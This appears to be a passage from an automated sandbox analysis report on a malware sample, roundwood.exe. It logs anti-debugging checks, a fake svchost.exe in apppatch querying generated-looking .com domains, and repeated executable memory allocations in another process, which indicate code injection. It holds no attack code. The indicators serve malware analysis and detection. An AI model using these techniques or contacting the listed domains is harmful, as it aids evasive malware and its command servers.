Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_00401DE0 rdtsc

0_2_00401DE0

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe

Code function: 4_2_012F7430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,

4_2_012F7430

Source: C:\Users\user\Desktop\roundwood.exe

0_2_00401000

Source: C:\Windows\apppatch\svchost.exe

2_2_02D17300

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_004020C0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_004020C0

Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]	0_2_00406800
Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]	0_2_00406B60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]	2_2_00406800
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]	2_2_00406B60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028C1360 mov edx, dword ptr fs:[00000030h]	2_2_028C1360
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_028C1000 mov eax, dword ptr fs:[00000030h]	2_2_028C1000
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01241360 mov edx, dword ptr fs:[00000030h]	4_2_01241360
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_01241000 mov eax, dword ptr fs:[00000030h]	4_2_01241000
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00DD1360 mov edx, dword ptr fs:[00000030h]	5_2_00DD1360
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00DD1000 mov eax, dword ptr fs:[00000030h]	5_2_00DD1000
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C51360 mov edx, dword ptr fs:[00000030h]	8_2_00C51360
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00C51000 mov eax, dword ptr fs:[00000030h]	8_2_00C51000

Source: C:\Users\user\Desktop\roundwood.exe

Code function: 0_2_004028B0 IsUserAnAdmin,VirtualQuery,GetModuleFileNameA,PathFileExistsA,GetSystemWindowsDirectoryA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,_snprintf,CopyFileA,RtlImageNtHeader,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,MoveFileExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GlobalFindAtomA,ExitProcess,GlobalAddAtomA,

0_2_004028B0

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_001F5CDB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_001F5CDB
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_001F14C3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_001F14C3
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_001F194F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_001F194F
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_001F1AE2 SetUnhandledExceptionFilter,	8_2_001F1AE2

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\apppatch\svchost.exe	Domain query: lysyvan.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: puzymig.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: vocydof.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: lyrysyj.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: volymaf.com
Source: C:\Windows\System32\svchost.exe	Domain query: qexylup.com
Source: C:\Windows\System32\svchost.exe	Domain query: qetysuq.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: lyvytuj.com

Allocates memory in foreign processes

Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1240000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: DD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: C50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1410000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 900000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 1450000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2920000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 8E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2920000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2410000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 28C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2760000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3090000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2140000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2740000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2500000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3180000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 26C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2650000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: B30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: AA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2610000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2910000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: B20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2DA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2260000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2360000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2BC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 12E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2A00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 26C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 21B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2C80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 3030000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 25C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2590000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 22C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2E00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 24E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 23B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2980000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 900000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2250000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 27A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 24E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2650000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2AF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2590000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 29A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 7B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2F70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 7C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe base: 2B30000 protect: page execute and read and write	Jump to behavior
